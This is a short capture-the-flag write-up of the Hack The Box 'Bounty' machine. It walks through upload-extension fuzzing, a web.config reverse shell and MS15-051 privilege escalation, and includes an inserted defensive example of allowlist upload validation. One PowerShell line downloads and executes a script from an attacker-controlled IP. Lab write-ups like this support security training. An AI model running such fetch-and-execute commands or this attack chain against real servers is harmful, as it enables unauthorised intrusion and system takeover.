Hack The Box :: Bounty

HTTP Upload File Restriction | UnPatched OS

Run nmap and then gobuster to discover the transfer.aspx webpage.

It looks like png and jpeg are allowed, but an upload with the .aspx extension is blocked.

To find out which extensions are allowed, get the list of extensions from microsoft.com.

Automate the submission of all the extensions using Burp.

So .config is allowed.
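The result above (.aspx rejected, .config accepted) is what a denylist-style upload filter produces. The following is an added example, not code from the box or from this write-up, that contrasts such a filter with an allowlist that also checks the file's leading bytes. The denylist contents, function names and sample uploads are assumptions constructed for illustration, and Python stands in for the application's ASP.NET code.

```python
import os
import uuid

# Assumption: the server filter is a denylist roughly like this one; the page
# only shows that .aspx is rejected while .config gets through.
DENYLIST = {".aspx", ".asp", ".exe"}

# Allowlist: extension -> magic bytes the file content must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

def denylist_accepts(filename):
    """Weak check: anything not explicitly blocked is accepted."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST

def allowlist_check(filename, content):
    """Hardened check: returns (accepted, reason)."""
    # Keep only the final path component, whichever separator the client sent.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if not stem or ext not in ALLOWED:
        return False, "extension not on allowlist"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"

def storage_name(filename):
    """Server-chosen name, so a client-supplied name never lands on disk."""
    return uuid.uuid4().hex + os.path.splitext(filename)[1].lower()

# Constructed sample uploads (name, first bytes of the body).
SAMPLES = [
    ("logo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("photo.JPG", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("shell.aspx", b"<%@ Page Language=\"C#\" %>"),
    ("web.config", b"<?xml version=\"1.0\"?><configuration/>"),
    ("fake.png", b"<?xml version=\"1.0\"?><configuration/>"),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        ok, reason = allowlist_check(name, body)
        print(f"{name:12} denylist={denylist_accepts(name)!s:5} allowlist={ok!s:5} ({reason})")
```

Storing uploads under a server-chosen name in a directory the web server does not serve or execute from complements the check.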

Searching these keywords in Google gives us a vulnerability.

Let's try to get a reverse shell using this web.config vulnerability.

And we get a shell.

To recon and find a privilege escalation path, let's use Sherlock.

IEX (New-Object Net.WebClient).downloadString('http://10.10.14.14/priv.ps1')

I am using a pre-compiled binary for MS15-051 (not recommended, though).

And we have admin!
